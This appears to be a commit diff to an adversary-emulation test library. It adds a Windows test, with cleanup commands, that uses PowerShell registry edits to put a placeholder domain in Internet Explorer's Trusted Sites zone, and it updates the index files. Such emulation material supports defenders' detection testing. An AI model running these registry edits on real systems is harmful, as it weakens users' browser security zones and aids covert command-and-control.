Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1112/T1112.md

@@ -20,6 +20,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
 
+- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
+
 
 <br/>
 
@@ -180,3 +182,30 @@ Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_
 ```
 
 <br/>
+<br/>
+
+## Atomic Test #6 - Add domain to Trusted sites Zone
+Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
+https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf 
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+$name ="bad-subdomain"
+new-item $key -Name $name -Force
+new-itemproperty $key$name -Name https -Value 2 -Type DWORD; 
+new-itemproperty $key$name -Name http  -Value 2 -Type DWORD; 
+new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;
+```
+
+
+#### Cleanup Commands:
+```
+$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+Remove-item  $key -Recurse
+```
+
+<br/>

atomics/index.md

@@ -316,6 +316,7 @@
   - Atomic Test #3: Modify Registry of Another User Profile [windows]
   - Atomic Test #4: Modify registry to store logon credentials [windows]
   - Atomic Test #5: Modify registry to store PowerShell code [windows]
+  - Atomic Test #6: Add domain to Trusted sites Zone [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]

atomics/index.yaml

@@ -9907,6 +9907,24 @@ defense-evasion:
           -Name #{registry_entry_storage}
 
 '
+    - name: Add domain to Trusted sites Zone
+      description: "Attackers may add a domain to the trusted site zone to bypass
+        defenses. Doing this enables attacks such as c2 over office365 as described
+        here:\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$key= \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet
+          Settings\\ZoneMap\\Domains\\bad-domain.com\\\"\n$name =\"bad-subdomain\"\nnew-item
+          $key -Name $name -Force\nnew-itemproperty $key$name -Name https -Value 2
+          -Type DWORD; \nnew-itemproperty $key$name -Name http  -Value 2 -Type DWORD;
+          \nnew-itemproperty $key$name -Name *     -Value 2 -Type DWORD; \n"
+        cleanup_command: |-
+          $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
+          Remove-item  $key -Recurse
   T1170:
     technique:
       x_mitre_data_sources:

atomics/windows-index.md

@@ -113,6 +113,7 @@
   - Atomic Test #3: Modify Registry of Another User Profile [windows]
   - Atomic Test #4: Modify registry to store logon credentials [windows]
   - Atomic Test #5: Modify registry to store PowerShell code [windows]
+  - Atomic Test #6: Add domain to Trusted sites Zone [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]